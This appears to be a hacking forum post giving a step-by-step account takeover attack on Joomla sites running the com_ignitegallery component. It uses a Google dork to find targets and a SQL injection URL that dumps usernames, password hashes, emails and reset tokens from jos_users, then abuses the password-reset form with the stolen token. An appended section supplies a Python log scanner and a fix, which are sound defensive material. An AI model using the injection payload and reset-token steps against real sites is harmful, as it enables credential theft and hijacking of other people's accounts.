Vulnerable on "com_ignitegallery"
Here are the steps:
- Find target on Google using this dork --> inurl:index.php?option=com_ignitegallery
  Example --> http://target.com/index.php?option=com_ignitegallery&Itemid=57
- Make some adjustment and put the red-long-url at the back of the url --> ?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat%28username,0x3a,password,0x3a,email,0x3a,activation,0x3a,usertype,0x3c62723e%29,4,5,6,7,8,9,10+from+jos_users--
  Example --> http://target/index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1%2C2%2Cgroup_concat%28username%2C0x3a%2Cpassword%2C0x3a%2Cemail%2C0x3a%2Cactivation%2C0x3a%2Cusertype%2C0x3c62723e%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10+from+jos_users--
- Focus on the change -->
  target:89143e2af0df46bd73034bba7caf27e4:OqGo1BDqKhOz7nPI18Xf3JSILKwsEe9s:target@gmail.com:
- Make another adjustment on the url again and put this --> ?option=com_user&view=reset
  Example --> http://target.com/index.php?option=com_user&view=reset
- Insert the target's email
  Example --> target@gmail.com
- Open new tab on the browser, make adjustment on the url --> ?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat%28username,0x3a,password,0x3a,email,0x3a,activation,0x3a,usertype,0x3c62723e%29,4,5,6,7,8,9,10+from+jos_users--
  Example --> http://target.com/index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1%2C2%2Cgroup_concat%28username%2C0x3a%2Cpassword%2C0x3a%2Cemail%2C0x3a%2Cactivation%2C0x3a%2Cusertype%2C0x3c62723e%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10+from+jos_users--
- Insert the target's token
  Example --> 89143e2af0df46bd73034bba7caf27e4
** Where do you find the token? Follow the colour that I have matched above.
Happy trying and enjoy hacking. :)
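Seen from the server side, the requests in these steps leave a recognisable trail in the web access log: a `com_ignitegallery` request whose `gallery` value is not a plain integer, and a `com_user&view=reset` request from the same client. The script below is an added example for site owners reviewing their logs, not part of the original post; the log lines are constructed samples and the function names `classify` and `scan` are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format, trimmed).
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?option=com_ignitegallery&task=view&gallery=4&Itemid=57 HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2024:10:02:10 +0000] "GET /index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1%2C2%2C3+from+jos_users-- HTTP/1.1" 200 6044
203.0.113.9 - - [01/Jan/2024:10:02:40 +0000] "GET /index.php?option=com_user&view=reset HTTP/1.1" 200 3010
198.51.100.7 - - [01/Jan/2024:10:05:00 +0000] "GET /index.php?option=com_user&view=reset HTTP/1.1" 200 3010
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*"')
INT_RE = re.compile(r"[0-9]+")

def classify(url):
    """Return 'tampered_gallery', 'reset' or None for one request URL."""
    # parse_qs decodes '+' and %XX, so encoded and plain payloads look the same here.
    q = parse_qs(urlsplit(url).query, keep_blank_values=True)
    option = q.get("option", [""])[0]
    if option == "com_ignitegallery":
        # A gallery id should be a plain non-negative integer; anything else is suspect.
        if any(not INT_RE.fullmatch(v) for v in q.get("gallery", [])):
            return "tampered_gallery"
    if option == "com_user" and q.get("view", [""])[0] == "reset":
        return "reset"
    return None

def scan(log_text):
    """Map client IP -> set of findings; 'correlated' marks both events from one client."""
    findings = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, url = m.groups()
        kind = classify(url)
        if kind:
            findings.setdefault(ip, set()).add(kind)
    for kinds in findings.values():
        if {"tampered_gallery", "reset"} <= kinds:
            kinds.add("correlated")
    return findings

if __name__ == "__main__":
    for ip, kinds in scan(SAMPLE_LOG).items():
        print(ip, sorted(kinds))
```

A password-reset request on its own is normal traffic; it is the pairing with a non-integer `gallery` value from the same client that deserves a closer look. The same integer check, applied in the application before the value reaches the query, is what closes the hole.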
